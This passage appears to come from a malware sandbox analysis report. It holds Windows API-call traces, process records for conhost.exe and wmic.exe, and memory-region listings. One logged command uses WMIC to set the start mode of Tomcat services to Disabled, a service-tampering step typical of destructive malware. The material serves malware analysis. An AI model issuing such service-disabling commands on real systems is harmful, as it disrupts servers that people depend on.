_String2="OneDriv", _MaxCount=0x7) returned -12 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0120.437] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0120.438] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0120.438] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0120.438] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0120.438] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0120.438] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0120.438] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4cbf278*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4cbf2c4 | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x4cbf2c4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xc64, dwThreadId=0xc4c)) returned 1 [0120.445] CloseHandle (hObject=0xa4) returned 1 [0120.445] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0120.445] GetEnvironmentStringsW () returned 0x4d19f70* [0120.445] FreeEnvironmentStringsA (penv="=") returned 1 [0120.445] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0121.189] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4cbf25c | out: lpExitCode=0x4cbf25c*=0x0) returned 1 [0121.189] CloseHandle (hObject=0xa8) returned 1 [0121.189] _vsnwprintf (in: _Buffer=0x4cbf344, _BufferCount=0x13, _Format="%08X", _ArgList=0x4cbf264 | out: _Buffer="00000000") returned 8 [0121.189] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0121.189] GetEnvironmentStringsW () returned 0x4d1b3e8* [0121.189] FreeEnvironmentStringsA (penv="=") returned 1 [0121.189] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0121.189] GetEnvironmentStringsW () returned 0x4d1b3e8* [0121.189] FreeEnvironmentStringsA (penv="=") returned 1 [0121.189] DeleteProcThreadAttributeList (in: lpAttributeList=0x4cbf2f0 | out: lpAttributeList=0x4cbf2f0) [0121.190] _get_osfhandle (_FileHandle=1) returned 0x3c [0121.190] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0121.190] _get_osfhandle (_FileHandle=1) returned 0x3c [0121.190] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0121.190] _get_osfhandle (_FileHandle=0) returned 0x38 [0121.190] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0121.190] SetConsoleInputExeNameW () returned 0x1 [0121.190] GetConsoleOutputCP () returned 0x1b5 [0121.190] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0121.190] SetThreadUILanguage (LangId=0x0) returned 0x409 [0121.191] exit (_Code=0) Thread: id = 311 os_tid = 0xc68 Process: id = "71" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x4811000" os_pid = "0xc20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "70" os_parent_pid = "0xc38" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4603 start_va = 0x7f443000 end_va = 0x7f443fff entry_point = 0x0 region_type = private name = "private_0x000000007f443000" filename = "" Region: id = 4604 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4605 start_va = 0x4708210000 end_va = 0x470822ffff entry_point = 0x0 region_type = private name = "private_0x0000004708210000" filename = "" Region: id = 4606 start_va = 0x4708230000 end_va = 0x4708243fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004708230000" filename = "" Region: id = 4607 start_va = 0x4708250000 end_va = 0x470828ffff entry_point = 0x0 region_type = private name = "private_0x0000004708250000" filename = "" Region: id = 4608 start_va = 0x7df5ff220000 end_va = 0x7ff5ff21ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff220000" filename = "" Region: id = 4609 start_va = 0x7ff6c4040000 end_va = 0x7ff6c4062fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4040000" filename = "" Region: id = 4610 start_va = 0x7ff6c406d000 end_va = 0x7ff6c406efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c406d000" filename = "" Region: id = 4611 start_va = 0x7ff6c406f000 end_va = 0x7ff6c406ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c406f000" filename = "" Region: id = 4612 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 4613 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4614 start_va = 0x47082a0000 end_va = 0x470839ffff entry_point = 0x0 region_type = private name = "private_0x00000047082a0000" filename = "" Region: id = 4615 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4616 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4617 start_va = 0x4708210000 end_va = 0x470821ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004708210000" filename = "" Region: id = 4618 start_va = 0x4708220000 end_va = 0x4708226fff entry_point = 0x0 region_type = private name = "private_0x0000004708220000" filename = "" Region: id = 4619 start_va = 0x4708290000 end_va = 0x4708290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004708290000" filename = "" Region: id = 4620 start_va = 0x47083a0000 end_va = 0x470845dfff entry_point = 0x47083a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4621 start_va = 0x4708460000 end_va = 0x470849ffff entry_point = 0x0 region_type = private name = "private_0x0000004708460000" filename = "" Region: id = 4622 start_va = 0x47084a0000 end_va = 0x47084a6fff entry_point = 0x0 region_type = private name = "private_0x00000047084a0000" filename = "" Region: id = 4623 start_va = 0x47084b0000 end_va = 0x47084b0fff entry_point = 0x0 region_type = private name = "private_0x00000047084b0000" filename = "" Region: id = 4624 start_va = 0x47084c0000 end_va = 0x47084c0fff entry_point = 0x0 region_type = private name = "private_0x00000047084c0000" filename = "" Region: id = 4625 start_va = 0x47085c0000 end_va = 0x47085cffff entry_point = 0x0 region_type = private name = "private_0x00000047085c0000" filename = "" Region: id = 4626 start_va = 0x47085d0000 end_va = 0x4708757fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000047085d0000" filename = "" Region: id = 4627 start_va = 0x4708760000 end_va = 0x47088e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004708760000" filename = "" Region: id = 4628 start_va = 0x47088f0000 end_va = 0x4709ceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000047088f0000" filename = "" Region: id = 4629 start_va = 0x7ff6c3f40000 end_va = 0x7ff6c403ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3f40000" filename = "" Region: id = 4630 start_va = 0x7ff6c406b000 end_va = 0x7ff6c406cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c406b000" filename = "" Region: id = 4631 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 4632 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4633 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4634 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4635 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4636 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4637 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4638 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4639 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4640 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4641 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4642 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 308 os_tid = 0xc54 Thread: id = 309 os_tid = 0xc58 Thread: id = 310 os_tid = 0x1f4 Process: id = "72" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x1fe0f000" os_pid = "0xc64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "70" os_parent_pid = "0xc38" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4656 start_va = 0x850000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 4657 start_va = 0x870000 end_va = 0x871fff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 4658 start_va = 0x880000 end_va = 0x893fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 4659 start_va = 0x8a0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 4660 start_va = 0x8e0000 end_va = 0x91ffff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 4661 start_va = 0x920000 end_va = 0x923fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 4662 start_va = 0x930000 end_va = 0x930fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 4663 start_va = 0x940000 end_va = 0x941fff entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 4664 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 4665 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 4666 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4667 start_va = 0x7fa10000 end_va = 0x7fa32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fa10000" filename = "" Region: id = 4668 start_va = 0x7fa35000 end_va = 0x7fa35fff entry_point = 0x0 region_type = private name = "private_0x000000007fa35000" filename = "" Region: id = 4669 start_va = 0x7fa37000 end_va = 0x7fa37fff entry_point = 0x0 region_type = private name = "private_0x000000007fa37000" filename = "" Region: id = 4670 start_va = 0x7fa3d000 end_va = 0x7fa3ffff entry_point = 0x0 region_type = private name = "private_0x000000007fa3d000" filename = "" Region: id = 4671 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4672 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4673 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 4674 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4675 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 4676 start_va = 0xb10000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 4677 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4678 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4679 start_va = 0xd10000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 4680 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4681 start_va = 0x850000 end_va = 0x85ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 4682 start_va = 0x860000 end_va = 0x863fff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 4683 start_va = 0x950000 end_va = 0xa0dfff entry_point = 0x950000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4684 start_va = 0xa10000 end_va = 0xa4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 4685 start_va = 0xa50000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 4686 start_va = 0xcd0000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 4687 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4688 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 4689 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 4690 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4691 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4692 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4693 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4694 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4695 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4696 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4697 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4698 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4699 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4700 start_va = 0x7f910000 end_va = 0x7fa0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f910000" filename = "" Region: id = 4701 start_va = 0x7fa3a000 end_va = 0x7fa3cfff entry_point = 0x0 region_type = private name = "private_0x000000007fa3a000" filename = "" Region: id = 4702 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4703 start_va = 0x870000 end_va = 0x870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 4704 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4705 start_va = 0xa90000 end_va = 0xa90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 4706 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4707 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4708 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4709 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4710 start_va = 0xe10000 end_va = 0x1146fff entry_point = 0xe10000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4711 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4712 start_va = 0xb20000 end_va = 0xc08fff entry_point = 0xb20000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4713 start_va = 0xaa0000 end_va = 0xaa3fff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 4714 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 4715 start_va = 0xab0000 end_va = 0xacffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 4716 start_va = 0xb20000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 4717 start_va = 0xad0000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 4718 start_va = 0x5370000 end_va = 0x554ffff entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 4719 start_va = 0xb20000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 4720 start_va = 0xc50000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 4721 start_va = 0x1150000 end_va = 0x122efff entry_point = 0x1150000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 4722 start_va = 0x5550000 end_va = 0x594ffff entry_point = 0x0 region_type = private name = "private_0x0000000005550000" filename = "" Region: id = 4723 start_va = 0xab0000 end_va = 0xab0fff entry_point = 0xab0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 4724 start_va = 0xac0000 end_va = 0xacffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 4725 start_va = 0xad0000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 4726 start_va = 0xb00000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 4727 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 4728 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4729 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4730 start_va = 0x75080000 end_va 